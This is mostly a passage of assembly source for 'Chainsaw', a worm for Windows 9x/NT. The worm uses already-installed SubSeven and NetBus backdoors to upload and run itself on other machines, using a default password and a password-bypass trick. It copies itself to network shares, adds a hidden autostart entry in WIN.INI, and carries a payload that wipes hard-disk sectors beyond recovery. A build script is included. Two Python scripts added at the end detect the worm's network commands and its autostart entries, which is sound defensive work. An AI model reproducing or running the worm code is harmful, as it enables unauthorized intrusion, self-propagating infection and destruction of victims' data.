                PUSH    OFFSET Connect_Select   ; within 1500ms.
                PUSH    0
                PUSH    0
                CALL    select

                INC     EAX                     ; Error?
                JZ      Close_NetBios

                DEC     EAX                     ; Zero sockets connected?
                JZ      Close_NetBios

                PUSH    OFFSET Boole_False      ; Switch sockets back to
                PUSH    FIONBIO                 ; blocking mode.
                PUSH    Sub7_Socket
                CALL    ioctlsocket

                PUSH    OFFSET Boole_False
                PUSH    FIONBIO
                PUSH    NetBus_Socket
                CALL    ioctlsocket

                MOV     EBX, Sub7_Socket        ; Set send/recv timeout on
                CALL    Set_Time_Outs           ; sockets to prevent endless
                                                ; blocking.
                MOV     EBX, NetBus_Socket
                CALL    Set_Time_Outs

                MOV     EDI, OFFSET Buffer      ; recv-buffer.

Try_Sub7:       PUSH    0                       ; Attempt to get SubSeven
                PUSH    512                     ; connection reply.
                PUSH    EDI
                PUSH    Sub7_Socket
                CALL    recv

                INC     EAX                     ; Not connected?
                JZ      Try_NetBus

                ; If it's a SubSeven server, and not password
                ; protected, it should reply with 'connected',
                ; and the time/date and version.

                CMP     [EDI], 'nnoc'           ; If we can't access the Sub7
                JNE     Try_NetBus              ; server, move on to NetBus.

                ; First request a file upload by sending
                ; 'RTF' with the upload path connected to
                ; it: 'RTFChainsaw.exe'.

                PUSH    0
                PUSH    (End_S7_Upload_Req-S7_Upload_Req)
                PUSH    OFFSET S7_Upload_Req
                PUSH    Sub7_Socket
                CALL    send

                INC     EAX
                JZ      Try_NetBus

                PUSH    0                       ; Fetch the reply, it should
                PUSH    512                     ; be 'TID' if all is OK.
                PUSH    EDI
                PUSH    Sub7_Socket
                CALL    recv

                INC     EAX
                JZ      Try_NetBus

                CMP     [EDI], 'nDIT'           ; Check for 'TID' (plus last
                JNE     Try_NetBus              ; byte of previous recv).

                ; First let the server know the filesize of the
                ; upload, this is done by sending a 'SFT' + the
                ; length of the filesize (represented by two
                ; numbers) + the actual filesize: 'SFT046144'.

                PUSH    0
                PUSH    (End_S7_Upload_Size-S7_Upload_Size)
                PUSH    OFFSET S7_Upload_Size
                PUSH    Sub7_Socket
                CALL    send

                INC     EAX
                JZ      Try_NetBus

                PUSH    0                       ; Then send the actual file
                PUSH    Worm_Size               ; contents.
                PUSH    OFFSET Worm_Code
                PUSH    Sub7_Socket
                CALL    send

                INC     EAX
                JZ      Try_NetBus

        ; SubSeven works with a 1041-byte receive buffer, every
        ; 1041 or less bytes received will be acknowledged with
        ; a 'p:' + the total amount of bytes received + '.'.

Retrieve_Ack:   PUSH    0                       ; Receive a 7-byte 'p:xxxx.'
                PUSH    7                       ; (don't read more than 7
                PUSH    EDI                     ; bytes as often the data is
                PUSH    Sub7_Socket             ; overlapping).
                CALL    recv

                INC     EAX
                JZ      Try_NetBus

                CMP     [EDI+2], '4416'         ; Last acknowledgement?
                JNE     Retrieve_Ack            ; Otherwise just go on.

        ; Check upload reply, which should be 'file successfully uploaded.'
        ; if all went fine, (however it seems to return this regardless of
        ; success or failure..).

Check_UL_Reply: PUSH    0
                PUSH    512
                PUSH    EDI
                PUSH    Sub7_Socket
                CALL    recv

                INC     EAX
                JZ      Try_NetBus

                CMP     [EDI+5], 'ccus'         ; Check for 'success'.
                JNE     Try_NetBus              ; Bail on error.

        ; Now remotely execute the uploaded worm copy by sending a
        ; 'FMX' + the path of the file to execute: 'FMXChainsaw.exe'.
        ; SubSeven uses ShellExecuteA to run files, so it is capable
        ; of opening any registered file extension such as .VBS etc.

                PUSH    0
                PUSH    (End_S7_Exec_Req-S7_Exec_Req)
                PUSH    OFFSET S7_Exec_Req
                PUSH    Sub7_Socket
                CALL    send

                INC     EAX
                JZ      Try_NetBus

                PUSH    0                       ; Fetch the command reply,
                PUSH    512                     ; which should be
                PUSH    EDI                     ; 'file has been executed.'.
                PUSH    Sub7_Socket
                CALL    recv

Try_NetBus:     PUSH    0                       ; Fetch connection reply.
                PUSH    512
                PUSH    EDI
                PUSH    NetBus_Socket
                CALL    recv

                INC     EAX
                JZ      Try_NetBios

                ; NetBus servers respond with 'NetBus', and
                ; the version, and if the server is password
                ; protected also with an 'x'.

                CMP     [EDI], 'BteN'           ; Is it an actual NetBus
                JNE     Try_NetBios             ; server?

                ; Server is password protected?

                CMP     BYTE PTR [EDI+EAX-3], 'x'
                JNE     Upload_Worm

                ; Now try one password, 'netbus' (should be commonly used
                ; I guess), together with a NetBus 1.60- backdoor function
                ; that accepts any password.

                PUSH    0
                PUSH    (End_NB_Password-NB_Password)
                PUSH    OFFSET NB_Password
                PUSH    NetBus_Socket
                CALL    send

                INC     EAX
                JZ      Try_NetBios

                PUSH    0                       ; Get password reply.
                PUSH    512
                PUSH    EDI
                PUSH    NetBus_Socket
                CALL    recv

                INC     EAX
                JZ      Try_NetBios

                ; If the password got accepted then it
                ; should return 'Access;1'.

                CMP     [EDI+4], '1;ss'         ; 'Access;1' ?
                JNE     Try_NetBios

                ; Request a file upload by sending 'UploadFile;'
                ; + filename + ';' + filesize + ';' + upload path:
                ; 'UploadFile;Chainsaw.exe;6144;\'.

Upload_Worm:    PUSH    0
                PUSH    (End_NB_Upload_Req-NB_Upload_Req)
                PUSH    OFFSET NB_Upload_Req
                PUSH    NetBus_Socket
                CALL    send

                INC     EAX
                JZ      Try_NetBios

                PUSH    0                       ; Fetch upload reply which
                PUSH    512                     ; should be 'UploadReady'.
                PUSH    EDI
                PUSH    NetBus_Socket
                CALL    recv

                INC     EAX
                JZ      Try_NetBios

                CMP     [EDI+4], 'eRda'         ; 'UploadReady' ?
                JNE     Try_NetBios

                ; Now connect to port number <NetBus_Port+1>,
                ; which will handle the upload file content.

                PUSH    0                       ; Create a socket for the
                PUSH    SOCK_STREAM             ; upload connection.
                PUSH    AF_INET
                CALL    socket

                MOV     NetBus_Socket_2, EAX

                INC     EAX
                JZ      Try_NetBios

                MOV     EBX, NetBus_Socket_2
                CALL    Set_Time_Outs

                PUSH    16                      ; Connect the upload socket.
                PUSH    OFFSET NetBus_Conn_2
                PUSH    NetBus_Socket_2
                CALL    connect

                XCHG    EBX, EAX

                OR      EBX, EBX
                JNZ     Close_NetBus_2

                PUSH    0                       ; Send through the upload
                PUSH    Worm_Size               ; file contents.
                PUSH    OFFSET Worm_Code
                PUSH    NetBus_Socket_2
                CALL    send

                XCHG    EBX, EAX

Close_NetBus_2: PUSH    NetBus_Socket_2
                CALL    closesocket

                INC     EBX
                JZ      Close_NetBios

                ; Now remotely execute the worm on the target's
                ; system by sending 'StartApp;' + path to program:
                ; 'StartApp;\Chainsaw.exe'.

                PUSH    0
                PUSH    (End_NB_Exec_File-NB_Exec_File)
                PUSH    OFFSET NB_Exec_File
                PUSH    NetBus_Socket                
                CALL    send

Try_NetBios:    MOV     ESI, OFFSET Net_Resource_Struc
                MOV     EDI, OFFSET Net_Resource

                MOV     ECX, 8
                REP     MOVSD

                CALL    Locate_Shares           ; Infect all shared drives.

Close_NetBios:  PUSH    NetBios_Socket
                CALL    closesocket

Close_NetBus:   PUSH    NetBus_Socket
                CALL    closesocket

Close_Sub7:     PUSH    Sub7_Socket
                CALL    closesocket

                JMP     Chk_Inet_State


; Set the recv/send timeout to 5 seconds to prevent endless blocking.
Set_Time_Outs:
                PUSH    4
                PUSH    OFFSET IO_Time_Out
                PUSH    SO_RCVTIMEO
                PUSH    SOL_SOCKET
                PUSH    EBX
                CALL    setsockopt

                PUSH    4
                PUSH    OFFSET IO_Time_Out
                PUSH    SO_SNDTIMEO
                PUSH    SOL_SOCKET
                PUSH    EBX
                CALL    setsockopt

                RETN


Random_AL_254:
                MOV     AL, 254

Random_AL:      MOVZX   EAX, AL

Random_EAX:     PUSH    EAX

                CALL    GetTickCount

                ADD     EAX, Random_Init
                JNP     Xor_In_Init

                RCL     EAX, 2
                XCHG    AL, AH
                ADD     AL, 66h

Xor_In_Init:    NOT     EAX

                PUSH    32
                POP     ECX

CRC_Bit:        SHR     EAX, 1
                JNC     Loop_CRC_Bit

                XOR     EAX, 0EDB88320h

Loop_CRC_Bit:   LOOP    CRC_Bit

                POP     ECX

                XOR     EDX, EDX
                DIV     ECX

                XCHG    EDX, EAX
                INC     EAX                     ; Can't be zero.

                ROL     Random_Init, 1          ; Adjust random seed.

                RETN


; And I thought NetBus was a lame buggy piece of shit, nothing beats
; SubSeven, even though it's one of the most advanced RAT's
; available these days, it is programmed pretty badly, the author
; clearly has no understanding of TCP/IP whatsoever, he doesn't
; even terminate his TCP commands with a terminator for example,
; which will lead to fragmented packets fucking up. Also, when you
; supply wrong commands to the server, it will downright hang itself.
; And as a bonus, SubSeven infected systems become slooow, not sure
; exactly why.. I'd say, leave writing RAT's to people who know
; their stuff, like the authors of Back Orifice 2000.


; Recursively scans the host's resources for shared drives.
Locate_Shares:
                PUSHAD

                PUSH    OFFSET Enum_Handle      ; Start enumerating all
                PUSH    OFFSET Net_Resource     ; shared drives.
                PUSH    0
                PUSH    RESOURCETYPE_DISK
                PUSH    RESOURCE_GLOBALNET
                CALL    WNetOpenEnumA

                OR      EAX, EAX
                JNZ     Exit_Loc_Share

                MOV     EBX, Enum_Handle

Enum_Resource:  MOV     Net_Struc_Count, 1

                PUSH    OFFSET Enum_Buf_Size    ; Find shared drive.
                PUSH    OFFSET Net_Resource
                PUSH    OFFSET Net_Struc_Count
                PUSH    EBX
                CALL    WNetEnumResourceA

                OR      EAX, EAX
                JNZ     Close_Enum

                CMP     Net_Usage, RESOURCEUSAGE_CONTAINER
                JNE     Infect_Share

                CALL    Locate_Shares

                JMP     Enum_Resource

Infect_Share:   MOV     Net_Local_Name, OFFSET Remote_Drive

                PUSH    0                       ; Map the shared drive to
                PUSH    0                       ; 'T:'.
                PUSH    0
                PUSH    OFFSET Net_Resource
                CALL    WNetAddConnection2A

                OR      EAX, EAX
                JNZ     Enum_Resource

                PUSH    1                       ; Copy Chainsaw.exe to the
                PUSH    OFFSET Remote_Trojan    ; root of this shared drive.
                PUSH    OFFSET Own_Path
                CALL    CopyFileA

                XCHG    ECX, EAX
                JECXZ   Un_Map_Share

                PUSH    OFFSET MsDos_Sys        ; Attempt to get the Win9x
                PUSH    260                     ; directory.
                PUSH    OFFSET Win_Dir
                PUSH    OFFSET Default_String
                PUSH    OFFSET Win_Dir_Key
                PUSH    OFFSET Paths_Section
                CALL    GetPrivateProfileStringA

                XCHG    ECX, EAX
                JECXZ   Un_Map_Share

                LEA     EDI, [Win_Dir+ECX]      ; Append '\WIN.INI' to it.
                MOV     ESI, OFFSET Slash_Win_Ini
                MOV     ECX, 9
                REP     MOVSB

                PUSH    OFFSET Win_Dir          ; Add 'run=\Chainsaw.exe' to
                PUSH    OFFSET Root_Dropper     ; Win9x's WIN.INI.
                PUSH    OFFSET Win_Ini_Run_Key
                PUSH    OFFSET Windows_Section
                CALL    WritePrivateProfileStringA

                XCHG    ECX, EAX
                JECXZ   Un_Map_Share

                PUSH    FILE_ATTRIBUTE_HIDDEN   ; Hide the drop file.
                PUSH    OFFSET Remote_Trojan
                CALL    SetFileAttributesA

Un_Map_Share:   PUSH    0                       ; Unmap shared drive.
                PUSH    0
                PUSH    OFFSET Remote_Drive
                CALL    WNetCancelConnection2A

                JMP     Enum_Resource

Close_Enum:     PUSH    EBX
                CALL    WNetCloseEnum

Exit_Loc_Share: POPAD

                RETN


; Ima go woop yo ass boy!
Payload:
                PUSH    0
                PUSH    0
                PUSH    CREATE_ALWAYS
                PUSH    0
                PUSH    0
                PUSH    GENERIC_WRITE
                PUSH    OFFSET Nuke_File
                CALL    CreateFileA

                XCHG    EBX, EAX

                PUSH    0                       ; Write bomb.
                PUSH    OFFSET Temp
                PUSH    666
                PUSH    OFFSET DOS_Bomb
                PUSH    EBX
                CALL    WriteFile

                PUSH    EBX
                CALL    CloseHandle

                PUSH    0                       ; Run the bomb (only WinExec
                PUSH    OFFSET Nuke_File        ; is capable of running DOS
                CALL    WinExec                 ; files too).

                JMP     $                       ; Heart stops..


        ; Bomb in DOS COM-format, this way it works both on 95/98 and NT/2K.
        ; Smashes disk structures of 1st 2 fixed disks, should be fast and
        ; unrecoverable.

;               .MODEL  TINY
;               .CODE
;
;               ORG     100h
;START:
;               MOV     AX, 3513h               ; Grab INT 13h's address.
;               INT     21h
;
;               MOV     Int13h, BX              ; Store it for later.
;               MOV     Int13h+2, ES
;
;               PUSH    CS
;               POP     ES
;
;               XOR     SI, SI
;
;               MOV     BX, OFFSET Trash_Text
;               MOV     CX, (End_Trash_Text-Trash_Text)
;
;               ; Decrypt trash text.
;
;Decrypt_Text:  XOR     BYTE PTR [BX+SI], 66h
;
;               INC     SI
;
;               LOOP    Decrypt_Text
;
;               INC     CX                      ; CX = 0001h.
;
;               MOV     DX, 80h+1               ; Start trashing backwards
;                                               ; from 2nd HDD.
;
;Kill_Head:     MOV     AX, 0302h               ; Smash 2 sectors of track
;               PUSHF                           ; 0 with our text.
;               DB      9Ah
;Int13h         DW      0, 0
;
;               INC     DH                      ; Smashed all heads?
;               JNZ     Kill_Head
;
;               DEC     DL                      ; Smashed all HDD's ?
;               JS      Kill_Head
;
;Exit:          RETN                            ; Back to Windoze..
;
;               DB      'T2'                    ; To pad this file to 666.
;
;               ; XOR 66h encrypted:
;
;               ; "THE FILM WHICH YOU ARE ABOUT TO SEE IS AN ACCOUNT OF THE
;               ; TRAGEDY WHICH BEFELL A GROUP OF FIVE YOUTHS. IN PARTICULAR
;               ; SALLY HARDESTY AND HER INVALID BROTHER FRANKLIN. IT IS ALL
;               ; THE MORE TRAGIC IN THAT THEY WERE YOUNG. BUT, HAD THEY
;               ; LIVED VERY, VERY LONG LIVES, THEY COULD NOT HAVE EXPECTED
;               ; NOR WOULD THEY HAVE WISHED TO SEE AS MUCH OF THE MAD AND
;               ; MACABRE AS THEY WERE TO SEE THAT DAY. FOR THEM AN IDYLLIC
;               ; SUMMER AFTERNOON DRIVE BECAME A NIGHTMARE. THE EVENTS OF
;               ; THAT DAY WERE TO LEAD TO THE DISCOVERY OF ONE OF THE MOST
;               ; BIZARRE CRIMES IN THE ANNALS OF AMERICAN HISTORY,
;               ; THE TEXAS CHAIN SAW MASSACRE..."
;
;               ; (I adore this movie :)
;
;Trash_Text:
;End_Trash_Text:
;               END     START

DOS_Bomb:

                END     START

                ; *shrug*, haven't really finished this piece-o-crap,
                ; mainly because I got fed up with all them bugs in
                ; the server programs.. also not sure if the NetBios
                ; shit works on remotes.. oh fuck it :|
─────────────────────────────────────────────────────────────[CHAINSAW.ASM]───
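The Try_Sub7 and Try_NetBus paths in CHAINSAW.ASM send a fixed command chain (upload request, size, file body, execute request) that is visible on the wire. The Python below is an added detection example, not part of the original source: it reassembles each flow's payloads, which matters because SubSeven commands carry no terminator, and flags any upload followed by execution of the same file, so it generalizes beyond the Chainsaw.exe name. The sample flows, banner text, segment tuples and function names are constructed for illustration, and the optional CR after NetBus commands is an assumption.

```python
import ntpath
import re

# Command strings are the ones quoted in the CHAINSAW.ASM comments.
S7_UPLOAD = re.compile(rb"RTF(?P<path>.+?)SFT(?P<ndig>\d\d)", re.S)
NB_UPLOAD = re.compile(
    rb"UploadFile;(?P<name>[^;\r\n]+);(?P<size>\d+);"
    rb"(?P<dir>.*?)(?=\r|\n|StartApp;|$)", re.S)
NB_EXEC = re.compile(rb"StartApp;(?P<path>[^\r\n]+)")


def reassemble(segments):
    """Join payloads per direction: 'c' = client to server, 's' = reply."""
    client = b"".join(p for d, p in segments if d == "c")
    server = b"".join(p for d, p in segments if d == "s")
    return client, server


def parse_subseven(client, server):
    """RTF<path>, SFT<2-digit length><size>, <size> body bytes, FMX<path>."""
    if not server.startswith(b"connected"):
        return None
    m = S7_UPLOAD.search(client)
    if m is None:
        return None
    ndig = int(m.group("ndig"))
    digits = client[m.end():m.end() + ndig]
    if len(digits) != ndig or not digits.isdigit():
        return None
    size = int(digits)
    # Skip the file body; a truncated capture leaves nothing after it.
    rest = client[m.end() + ndig + size:]
    executed = rest[3:].decode("latin-1") if rest.startswith(b"FMX") else None
    return {"family": "SubSeven",
            "uploaded": m.group("path").decode("latin-1"),
            "size": size, "executed": executed, "accepted": b"TID" in server}


def parse_netbus(client, server):
    """UploadFile;<name>;<size>;<dir> on the control port, then StartApp;<path>."""
    if not server.startswith(b"NetBus"):
        return None
    up = NB_UPLOAD.search(client)
    if up is None:
        return None
    ex = NB_EXEC.search(client, up.end())
    executed = ex.group("path").decode("latin-1") if ex else None
    return {"family": "NetBus",
            "uploaded": up.group("name").decode("latin-1"),
            "size": int(up.group("size")), "executed": executed,
            "accepted": b"UploadReady" in server}


def analyze_flow(segments):
    """Return a finding dict for a backdoor upload, or None for other traffic."""
    client, server = reassemble(segments)
    hit = parse_subseven(client, server) or parse_netbus(client, server)
    if hit is None:
        return None
    same = (hit["executed"] is not None and
            ntpath.basename(hit["executed"]).lower()
            == ntpath.basename(hit["uploaded"]).lower())
    hit["verdict"] = "upload-then-execute" if same else "upload-only"
    return hit


# Constructed sample flows (not captured traffic); the file body is zero-filled.
S7_FLOW = [
    ("s", b"connected. <time/date, version>"),
    ("c", b"RTFChain"), ("c", b"saw.exe"),      # one command split over two segments
    ("s", b"TID"),
    ("c", b"SFT046144"), ("c", b"\x00" * 6144),
    ("s", b"p:6144."), ("s", b"file successfully uploaded."),
    ("c", b"FMXChainsaw.exe"),
    ("s", b"file has been executed."),
]
NB_FLOW = [
    ("s", b"NetBus 1.60"),
    ("c", b"UploadFile;Chainsaw.exe;6144;\\"),
    ("s", b"UploadReady"),
    ("c", b"StartApp;\\Chainsaw.exe"),
]
BENIGN_FLOW = [("s", b"220 ready"), ("c", b"RTFM")]

if __name__ == "__main__":
    for flow in (S7_FLOW, NB_FLOW, NB_FLOW[:3], BENIGN_FLOW):
        print(analyze_flow(flow))
```

Matching on the reassembled stream rather than on single packets is what keeps the split 'RTFChain' / 'saw.exe' segments from slipping past the check.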
──────────────────────────────────────────────────────────────[CHAINSAW.RC]───
I ICON DISCARDABLE "BLACK.ICO"
──────────────────────────────────────────────────────────────[CHAINSAW.RC]───
────────────────────────────────────────────────────────────────────[Q.BAT]───
TASM32 CHAINSAW.ASM /ml /m
TLINK32 CHAINSAW.OBJ  C:\TASM\LIB\IMPORT32.LIB WININET.LIB -aa
BRC32 CHAINSAW.RC
UPX\UPX CHAINSAW.EXE --force
────────────────────────────────────────────────────────────────────[Q.BAT]───
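Locate_Shares in CHAINSAW.ASM registers the dropped copy by writing 'run=\Chainsaw.exe' to the [windows] section of WIN.INI on the mapped share. The Python below is an added triage example, not part of the original sources: it parses WIN.INI text and reports run=/load= entries that match the dropper name or start from a drive root. The sample file, the function names, the drive-root heuristic and the space/comma splitting of multiple entries are assumptions made for illustration.

```python
import ntpath
import re

DROPPER = "chainsaw.exe"    # file name the worm copies itself as, per the page


def autostart_entries(ini_text):
    """Yield (key, program) for run=/load= entries in the [windows] section."""
    section = None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        key, sep, value = line.partition("=")
        if section != "windows" or not sep:
            continue
        key = key.strip().lower()          # INI keys are case-insensitive
        if key in ("run", "load"):
            # Assumption: several programs may be listed, split on space/comma.
            for prog in re.split(r"[ ,]+", value.strip()):
                if prog:
                    yield key, prog


def triage_win_ini(ini_text):
    """Return (key, program, reasons) for autostart entries worth a look."""
    findings = []
    for key, prog in autostart_entries(ini_text):
        reasons = []
        _drive, tail = ntpath.splitdrive(prog)
        if ntpath.basename(tail).lower() == DROPPER:
            reasons.append("dropper name")
        if ntpath.dirname(tail) == "\\":
            reasons.append("starts from drive root")
        if reasons:
            findings.append((key, prog, reasons))
    return findings


# Constructed sample WIN.INI (not taken from a real host).
SAMPLE = """\
[windows]
load=
Run=C:\\WINDOWS\\SYSTEM\\SYSTRAY.EXE \\Chainsaw.exe
NullPort=None

[Desktop]
run=\\ignored-outside-windows-section.exe
"""

if __name__ == "__main__":
    for finding in triage_win_ini(SAMPLE):
        print(finding)
```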